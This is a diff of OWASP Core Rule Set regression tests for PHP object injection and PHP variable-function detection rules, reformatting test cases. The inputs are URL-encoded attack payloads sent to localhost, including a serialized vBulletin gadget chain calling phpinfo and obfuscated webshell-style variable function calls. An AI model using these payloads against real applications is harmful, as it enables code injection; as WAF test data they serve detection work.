- input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize4/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D" + version: "HTTP/1.1" + output: + log: + expect_ids: [933170] + - test_id: 6 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize5?O%3A8%3A%22stdClass%22%3A4%3A%7Bs%3A3%3A%22aaa%22%3Ba%3A5%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bi%3A2%3Bi%3A2%3Ba%3A1%3A%7Bi%3A0%3Bi%3A1%3B%7Di%3A3%3Bi%3A4%3Bi%3A4%3Bi%3A5%3B%7Ds%3A3%3A%22aaa%22%3Bi%3A1%3Bs%3A3%3A%22ccc%22%3BR%3A5%3Bs%3A3%3A%22ddd%22%3Bs%3A4%3A%22AAAA%22%3B%7D" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-7 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize5?O%3A8%3A%22stdClass%22%3A4%3A%7Bs%3A3%3A%22aaa%22%3Ba%3A5%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bi%3A2%3Bi%3A2%3Ba%3A1%3A%7Bi%3A0%3Bi%3A1%3B%7Di%3A3%3Bi%3A4%3Bi%3A4%3Bi%3A5%3B%7Ds%3A3%3A%22aaa%22%3Bi%3A1%3Bs%3A3%3A%22ccc%22%3BR%3A5%3Bs%3A3%3A%22ddd%22%3Bs%3A4%3A%22AAAA%22%3B%7D" + version: "HTTP/1.1" + output: + log: + expect_ids: [933170] + - test_id: 7 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize6" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-8 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize6" + version: "HTTP/1.1" + output: + log: + expect_ids: [933170] + - test_id: 8 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize7" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-9 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize7" + version: "HTTP/1.1" + output: + log: + expect_ids: [933170] + - test_id: 9 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize8" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-10 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize8" + version: "HTTP/1.1" + output: + log: + expect_ids: [933170] + - test_id: 10 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize9" - version: "HTTP/1.1" - output: - log_contains: id "933170" + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize9" + version: "HTTP/1.1" + output: + log: + expect_ids: [933170] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml index 570c68e4b..380694bd4 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml @@ -1,583 +1,600 @@ --- meta: author: "lifeforms, azurit" - description: None - enabled: true - name: 933180.yaml +rule_id: 933180 tests: - - test_title: 933180-1 + - test_id: 1 desc: PHP variable functions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=" - version: "HTTP/1.1" - output: - no_log_contains: id "933180" - - test_title: 933180-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933180] + - test_id: 2 desc: $a(1) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24a%281%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%24a%281%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 3 desc: $$b(2) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24%24b%282%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%24%24b%282%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 4 desc: $_(3) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24_%283%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%24_%283%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 5 desc: '@$__[o](4)' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%40%24__%5Bo%5D%284%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%40%24__%5Bo%5D%284%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 6 desc: $__['o'](5) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24__%5B%27o%27%5D%285%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%24__%5B%27o%27%5D%285%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 7 desc: $__[@o](6) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24__%5B%40o%5D%286%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%24__%5B%40o%5D%286%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 8 desc: $__[$_[1]](7) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24__%5B%24_%5B1%5D%5D%287%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%24__%5B%24_%5B1%5D%5D%287%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 9 desc: $__[@$c](8) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24__%5B%40%24c%5D%288%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%24__%5B%40%24c%5D%288%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 10 desc: $d['o'](9) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: '%24d%5B%27o%27%5D%289%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: '%24d%5B%27o%27%5D%289%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 11 desc: ${@a}(10) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24%7B%40a%7D%2810%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%24%7B%40a%7D%2810%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 12 desc: ${'a'}(11) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?foo=%24%7B%27a%27%7D%2811%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?foo=%24%7B%27a%27%7D%2811%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 13 desc: ${@$b}(12) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24%7B%40%24b%7D%2812%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24%7B%40%24b%7D%2812%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 14 desc: ${$s20}['q53b3a6'](13) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: '%24%7B%24s20%7D%5B%27q53b3a6%27%5D%2813%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: '%24%7B%24s20%7D%5B%27q53b3a6%27%5D%2813%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 15 desc: $GLOBALS['cf908275'](14) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24GLOBALS%5B%27cf908275%27%5D%2814%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%24GLOBALS%5B%27cf908275%27%5D%2814%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 16 desc: $OOO000000{0}(15) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'c=%24OOO000000%7B0%7D%2815%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'c=%24OOO000000%7B0%7D%2815%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 17 desc: $OOO0000O0 (16) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24OOO0000O0%20%2816%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24OOO0000O0%20%2816%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 18 desc: $_aB_4c[5]['d'] /*lol*/ (17) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24_aB_4c%5B5%5D%5B%27d%27%5D%20%2F%2Alol%2A%2F%20%2817%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24_aB_4c%5B5%5D%5B%27d%27%5D%20%2F%2Alol%2A%2F%20%2817%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 19 desc: $_aB_4c[@5]/*wat*/[@d] (18) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'x=%24_aB_4c%5B%405%5D%2F%2Awat%2A%2F%5B%40d%5D%20%28%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'x=%24_aB_4c%5B%405%5D%2F%2Awat%2A%2F%5B%40d%5D%20%28%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 20 desc: $_aB_4c/*foo*/[@5]/*bar*/[@d]/*baz*/(19) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'y=%24_aB_4c%2F%2Afoo%2A%2F%5B%405%5D%2F%2Abar%2A%2F%5B%40d%5D%2F%2Abaz%2A%2F%2819%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'y=%24_aB_4c%2F%2Afoo%2A%2F%5B%405%5D%2F%2Abar%2A%2F%5B%40d%5D%2F%2Abaz%2A%2F%2819%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 21 desc: $___[@-_](20) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24___%5B%40-_%5D%2820%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24___%5B%40-_%5D%2820%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 22 desc: '@$___[@!+_](21)' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%40%24___%5B%40%21%2B_%5D%2821%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%40%24___%5B%40%21%2B_%5D%2821%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 23 desc: $b374k=@$s_func(22) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24b374k%3D%40%24s_func%2822%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%24b374k%3D%40%24s_func%2822%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 24 desc: $function\r\n (23) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24function%0D%0A%20%2823%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%24function%0D%0A%20%2823%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 25 desc: $__[_](24) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24__%5B_%5D%2824%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24__%5B_%5D%2824%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 26 desc: $____[_]{_}[@_](25) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24____%5B_%5D%7B_%7D%5B%40_%5D%2825%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24____%5B_%5D%7B_%7D%5B%40_%5D%2825%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 27 desc: multiline with comments stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: x=%24_aB_4c%20%23foo%0D%0A%09%5B5%5D%2F%2Fbar%0D%0A%09%5B%27d%27%5D%20%2F%2Afoo%2A%2F%20%2817%29 - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: x=%24_aB_4c%20%23foo%0D%0A%09%5B5%5D%2F%2Fbar%0D%0A%09%5B%27d%27%5D%20%2F%2Afoo%2A%2F%20%2817%29 + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 28 desc: $$$z(29) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: 